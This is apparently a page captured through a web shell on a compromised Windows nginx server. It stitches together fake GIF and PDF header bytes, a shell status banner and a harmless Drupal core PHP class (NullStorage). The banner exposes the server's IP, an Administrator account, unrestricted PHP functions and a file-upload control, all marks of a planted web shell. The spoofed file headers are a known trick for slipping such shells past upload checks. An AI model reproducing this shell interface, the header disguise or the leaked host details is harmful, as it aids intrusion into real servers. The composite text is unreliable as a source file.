GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Config/ |
Upload File : |
<?php namespace Drupal\Core\Config; /** * Defines a stub storage. * * This storage is always empty; the controller reads and writes nothing. * * The stub implementation is needed for synchronizing configuration during * installation of a module, in which case all configuration being shipped with * the module is known to be new. Therefore, the module installation process is * able to short-circuit the full diff against the active configuration; the * diff would yield all currently available configuration as items to remove, * since they do not exist in the module's default configuration directory. * * This also can be used for testing purposes. */ class NullStorage implements StorageInterface { /** * {@inheritdoc} */ public function exists($name) { return FALSE; } /** * {@inheritdoc} */ public function read($name) { return []; } /** * {@inheritdoc} */ public function readMultiple(array $names) { return []; } /** * {@inheritdoc} */ public function write($name, array $data) { return FALSE; } /** * {@inheritdoc} */ public function delete($name) { return FALSE; } /** * {@inheritdoc} */ public function rename($name, $new_name) { return FALSE; } /** * {@inheritdoc} */ public function encode($data) { return $data; } /** * {@inheritdoc} */ public function decode($raw) { return $raw; } /** * {@inheritdoc} */ public function listAll($prefix = '') { return []; } /** * {@inheritdoc} */ public function deleteAll($prefix = '') { return FALSE; } /** * {@inheritdoc} */ public function createCollection($collection) { // No op. } /** * {@inheritdoc} */ public function getAllCollectionNames() { return []; } /** * {@inheritdoc} */ public function getCollectionName() { return ''; } }